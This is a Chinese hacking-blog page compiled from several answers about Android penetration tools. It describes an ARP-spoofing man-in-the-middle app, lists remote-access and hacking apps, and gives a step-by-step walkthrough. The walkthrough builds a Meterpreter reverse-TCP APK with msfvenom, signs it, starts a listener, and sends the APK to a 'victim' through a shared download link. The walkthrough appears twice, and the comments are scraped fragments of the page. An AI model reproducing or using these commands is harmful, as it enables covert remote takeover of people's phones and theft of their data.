右侧
国内最专业的黑客技术博客
当前位置:网站首页 > 入侵后台 > 正文

安卓手机渗透工具_手机渗透工具android

作者:hacker发布时间:2022-09-03分类:入侵后台浏览:161评论:5


导读:目录:1、android中间人攻击测试工具lanmitm怎么用2、如何使用metasploit对安卓手机进行控制3、如何使用Metasploit对安卓手机进行控制...

目录:

android中间人攻击测试工具lanmitm怎么用

笔者实习快四个月了,刚来公司的时候没什么任务,空闲的时候发现了安卓渗透神器dsploit,安装玩了几次。其实以前也听说过中间人攻击,也玩过ettercap,MITMf,metasploit等,但是一直没想过在Android上面实现这些功能,于是乎下载dsploit源码玩了几天。

刚好自己也是做Android相关工作的,所以有了自己写一个的想法,依葫芦画瓢开发了这个工具。

免责声明

本应用开发初衷仅为了学习,未经他人允许,对他人局域网进行的破坏,干扰等行为与本人无关。

功能概述

数据嗅探,可抓去局域网内部主机与外界通信数据

会话劫持,对局域网中的主机通过实施ARP欺骗,进行cookie欺骗,从而达到劫持会话的效果

简单web服务器功能,结合下面功能实施钓鱼欺骗

URL重定向,实现DNS欺骗功能。配合上面web服务器功能,可进行钓鱼欺骗功能待(待完成)

WiFi终结,中断局域网内主机与外界通信(待完成)

代码注入,通过数据截取,对远程主机返回的数据进行篡改,实现代码注入的效果(待完成)

截图预览

安装前提

1、安卓手机2.3及以上,必须root

2、已安装busybox

下载地址

虽然该应用目前功能单一,但是毕竟是自己慢慢写出来的,我还是会继续更新下去的。如果有想法,或者想学习的同学都欢迎和我交流

直接贡献代码

如何使用metasploit对安卓手机进行控制

在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机:Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk

```

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名:

l Keytool (已安装)

l jar signer (已安装)

l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

`

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

`

Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK,它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192.168.152.128

SET LPORT 4444

Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

1、从下载android x86的iso。

2、使用vmware创建一个内核版本为2.6的虚拟机。

3、挂载镜像,启动虚拟机。

4、进入Live模式。

5、设置手机并登陆谷歌帐号。

在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。

另外要允许安卓安装来历不明的apk。

切换回Kali,我们发现创建了一个新的会话。

然后你就可以为所欲为的操作这台“手机”了。

如何使用Metasploit对安卓手机进行控制

打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk

```

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

回答不容易,希望能帮到您,满意请帮忙采纳一下,谢谢

2016 黑客的 Android 工具箱都有哪些

AndroRAT

AndroRAT一词源自Android与RAT(即远程管理工具)。这款顶级黑客工具已经拥有相当长的发展历史,而且最初其实是一款客户端/服务器应用。这款应用旨在帮助用户以远程方式控制Android系统,同时从其中提取信息。这款Android应用会在系统启动完成后以服务形式开始运行。因此,如果用户并不需要与该服务进行交互。此应用还允许大家通过呼叫或者短信等方式触发服务器连接。

这款极具实用性的Android黑客应用之功能包括收集联系人、通话记录、消息以及所在位置等信息。此应用还允许大家以远程方式对接收到的消息以及手机运行状态加以监控,进行手机呼叫与短信发送,通过摄像头拍摄照片以及在默认浏览器当中打开URL等等。

Hackode

Hackode是一款Android应用,其基本上属于一整套工具组合,主要面向高阶黑客、IT专家以及渗透测试人员。在这款应用当中,我们可以找到三款模块——Reconnaissance、Scanning以及Security Feed。

通过这款应用,大家可以实现谷歌攻击、SQL注入、MySQL Server、Whois、Scanning、DNS查找、IP、MX记录、DNS Dif、Security RSS Feed以及漏洞利用等功能。这是一款出色的Android黑客应用,非常适合入门者作为起步工具且无需提供任何个人隐私信息。

zANTI

zANTI是一款来自Zimperium的知名Android黑客套件。此软件套件当中包含多种工具,且广泛适用于各类渗透测试场景。这套移动渗透测试工具包允许安全研究人员轻松对网络环境加以扫描。此工具包还允许IT管理员模拟出一套先进黑客环境,并以此为基础检测多项恶意技术方案。

大家可以将zANTI视为一款能够将Backtrack强大力量引入自己Android设备的应用。只要登录至zANTI,它就会映射整套网络并嗅探其中的cookie以掌握此前曾经访问过的各个网站——这要归功于设备当中的ARP缓存。

应用当中的多种模块包括网络映射、端口发现、嗅探、数据包篡改、DoS以及MITM等等。

标签:手机渗透工具android


已有5位网友发表了看法:

  • 访客

    访客  评论于 2022-09-04 07:56:53  回复

    ulti/handlerSet PAYLOAD android/meterpreter/reverse_tcpSET LHOST 192.168.152.128SET LPORT 4444Explo

  • 访客

    访客  评论于 2022-09-04 04:53:37  回复

    出一套先进黑客环境,并以此为基础检测多项恶意技术方案。大家可以将zANTI视为一款能够将Backtrack强大力量引入自己Android设备的应用。只要登录至zANTI,它就会映射整套网络并嗅探其中的cookie以掌握此前曾经访问过的

  • 访客

    访客  评论于 2022-09-04 07:57:24  回复

    e APPNAME.apk aliasname` 再用JARsigner验证签名jarsigner -verify -verbose -certs APPNAME.apk`Kali没有预装Zipalign,需要先apt-get install zipalign。然后

  • 访客

    访客  评论于 2022-09-04 06:39:53  回复

    目录:1、android中间人攻击测试工具lanmitm怎么用2、如何使用metasploit对安卓手机进行控制3、如何使用Metasploit对安卓手机进行控制4、2016 黑客的 Android 工具箱都有哪些android中间人攻击测试工具lanmitm怎么用笔者实习快四个月

  • 访客

    访客  评论于 2022-09-04 01:46:13  回复

    d设备。创建负载我们需要两台虚拟机:Kali Linux和安卓模拟器。打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。M

欢迎 发表评论:

入侵后台排行
最近发表
标签列表